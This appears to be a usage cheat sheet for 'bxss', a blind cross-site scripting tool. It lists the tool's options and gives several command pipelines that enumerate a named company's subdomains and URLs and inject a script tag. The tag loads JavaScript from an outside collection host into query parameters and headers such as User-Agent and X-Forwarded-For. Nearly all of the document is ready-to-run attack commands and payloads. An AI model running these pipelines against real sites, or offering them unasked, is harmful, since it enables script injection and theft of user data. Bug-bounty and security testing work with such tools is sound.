Argument	Description				Default
-a		Append the payload to the parameter	false
-c int		Set the concurrency level		30
-H string	Set a custom header			""
-hf string	Path to file with headers		""
-p string	The blind XSS payload			""
-pf string	Path to file with payloads		""
-t		Test parameters for blind XSS		false
-X string	HTTP method to use			""
-v		Enable debug mode			false
-rl float	Rate limit (requests per second)	0
-f		Follow redirects			false
-l		Enable Trace Mode (experimental)	false

===================================================================

Parameters : 

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

===================================================================

Append To Parameters : 

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

===================================================================

Both Headers & Parameters :

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

===================================================================

X-Forwarded-For Header : 

subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

===================================================================

Custom Headers & Parameters : 

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

===================================================================

Google Dorks With Dorki : 

curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

===================================================================

Custom Headers & Parameters With Rate Limit :

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

===================================================================